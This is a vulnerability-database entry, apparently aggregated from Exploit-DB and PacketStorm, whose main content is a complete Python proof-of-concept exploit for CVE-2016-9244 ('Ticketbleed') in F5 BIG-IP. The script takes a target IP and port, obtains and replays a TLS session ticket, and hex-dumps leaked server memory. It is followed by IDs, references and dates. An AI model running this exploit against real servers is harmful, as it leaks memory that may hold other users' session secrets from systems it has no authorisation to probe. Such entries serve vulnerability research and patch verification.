lol ty filippo!
ty tintinweb!
0000000000000
0000000000000000000 00
00000000000000000000000000000
0000000000000000000000000000000
000000000 0000000000
00000000 0000000000
0000000 000000000000
0000000 000000000000000
000000 000000000 000000
0000000 000000000 000000
000000 000000000 000000
000000 000000000 000000
000000 00000000 000000
000000 000000000 000000
0000000 000000000 0000000
000000 000000000 000000
0000000000000000 0000000
0000000000000 0000000
00000000000 00000000
00000000000 000000000
0000000000000000000000000000000
00000000000000000000000000000
000 0000000000000000000
0000000000000
@0x00string
https://github.com/0x00string/oldays/blob/master/CVE-2016-9244.py
'''

def usage ():
print ("python script.py <args>\n"
" -h, --help: Show this message\n"
" -a, --rhost: Target IP address\n"
" -b, --rport: Target port\n"
"\n\n"
"Examples:\n"
"python script.py -a 10.10.10.10 -b 443\n"
"python script.py --rhost 10.10.10.10 --rport 8443")
exit()

def pretty (t, m):
if (t is "+"):
print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n",
elif (t is "-"):
print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n",
elif (t is "*"):
print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n",
elif (t is "!"):
print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n",

def createDump (input):
d, b, h = '', [], []
u = list(input)
for e in u:
h.append(e.encode("hex"))
if e == '0x0':
b.append('0')
elif 30 > ord(e) or ord(e) > 128:
b.append('.')
elif 30 < ord(e) or ord(e) < 128:
b.append(e)

i = 0
while i < len(h):
if (len(h) - i ) >= 16:
d += ' '.join(h[i:i+16])
d += " "
d += ' '.join(b[i:i+16])
d += "\n"
i = i + 16
else:
d += ' '.join(h[i:(len(h) - 0 )])
pad = len(' '.join(h[i:(len(h) - 0 )]))
d += ' ' * (56 - pad)
d += ' '.join(b[i:(len(h) - 0 )])
d += "\n"
i = i + len(h)
return d

def ticketBleed (rhost, rport):
h = (rhost,int(rport));
version = TLSVersion.TLS_1_2
secret = ""
session_ticket = ""
sid = ""
cipher = TLSCipherSuite.ECDHE_RSA_WITH_AES_256_CBC_SHA
with TLSSocket(socket.socket(), client=True) as sock:
sock.connect(h)
ctx = sock.tls_ctx
packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=version, cipher_suites=TLS_CIPHER_SUITES.keys(), extensions=[TLSExtension() / TLSExtSessionTicketTLS(data="")])
sock.sendall(packet)
sock.recvall()
packet_ke = TLSRecord(version=version) / TLSHandshake() / ctx.get_client_kex_data()
packet_ccs = TLSRecord(version=TLSVersion.TLS_1_2) / TLSChangeCipherSpec()
sock.sendall(TLS.from_records([packet_ke, packet_ccs]))
sock.sendall(to_raw(TLSFinished(), ctx))
ret = sock.recvall()
session_ticket = ret[TLSSessionTicket].ticket
secret = ctx.master_secret
#pretty("*", "ctx 1: \n" + str(ctx))
with TLSSocket(socket.socket(), client=True) as sock:
sock.connect(h)
ctx = sock.tls_ctx
packet = TLSRecord() / TLSHandshake() / TLSClientHello(version=TLSVersion.TLS_1_2, cipher_suites=TLS_CIPHER_SUITES.keys(), session_id="A", extensions=[TLSExtension() / TLSExtSessionTicketTLS(data=session_ticket)])
sock.tls_ctx.resume_session(secret)
sock.sendall(packet)
ret = sock.recvall()
sid = ret[TLSServerHello].session_id
#pretty("*", "ctx 2: \n" + str(ctx))
pretty("+", "bled 'A' + 31 bytes: \n" + createDump(sid))

def main():
rhost = None;
rport = None;
options, remainder = getopt.getopt(sys.argv[1:], 'a:b:h:', ['rhost=','rport=','help',])
for opt, arg in options:
if opt in ('-h', '--help'):
usage()
elif opt in ('-a','--rhost'):
rhost = arg;
elif opt in ('-b','--rport'):
rport = arg;
banner()
if rhost is None or rport is None:
usage()
ticketBleed(rhost,rport)
exit(0);

if __name__ == "__main__":
main()

Trust: 1.0

sources: EXPLOIT-DB: 44446

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 44446

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 44446

TYPE

'Ticketbleed' Memory Disclosure

Trust: 1.6

sources: EXPLOIT-DB: 44446 // EDBNET: 97481

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

sources: PACKETSTORM: 141017

CREDITS

@0x00string

Trust: 0.6

sources: EXPLOIT-DB: 44446

EXTERNAL IDS

db:NVDid:CVE-2016-9244

Trust: 3.0

db:EXPLOIT-DBid:44446

Trust: 1.6

db:EDBNETid:97481

Trust: 0.6

db:0DAYTODAYid:30168

Trust: 0.6

db:EDBNETid:97483

Trust: 0.6

db:PACKETSTORMid:141017

Trust: 0.5

db:BIDid:96143

Trust: 0.3

sources: BID: 96143 // PACKETSTORM: 141017 // EXPLOIT-DB: 44446 // EDBNET: 97481 // EDBNET: 97483

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2016-9244

Trust: 1.5

url:https://github.com/0x00string/oldays/blob/bf7cf4127dba1aa9a0315a716ea778b66969f694/cve-2016-9244.py

Trust: 1.0

url:https://www.exploit-db.com/exploits/44446/

Trust: 0.6

url:https://0day.today/exploits/30168

Trust: 0.6

url:https://support.f5.com/csp/article/k05121675

Trust: 0.3

url:https://blog.filippo.io/finding-ticketbleed/

Trust: 0.3

url:http://www.f5.com/products/big-ip/

Trust: 0.3

url:https://filippo.io/ticketbleed/

Trust: 0.3

sources: BID: 96143 // PACKETSTORM: 141017 // EXPLOIT-DB: 44446 // EDBNET: 97481 // EDBNET: 97483

SOURCES

db:BIDid:96143
db:PACKETSTORMid:141017
db:EXPLOIT-DBid:44446
db:EDBNETid:97481
db:EDBNETid:97483

LAST UPDATE DATE

2022-07-27T09:37:37.500000+00:00


SOURCES UPDATE DATE

db:BIDid:96143date:2017-03-07T03:02:00

SOURCES RELEASE DATE

db:BIDid:96143date:2017-02-09T00:00:00
db:PACKETSTORMid:141017date:2017-02-10T22:22:22
db:EXPLOIT-DBid:44446date:2017-02-14T00:00:00
db:EDBNETid:97481date:2018-04-12T00:00:00
db:EDBNETid:97483date:2018-04-12T00:00:00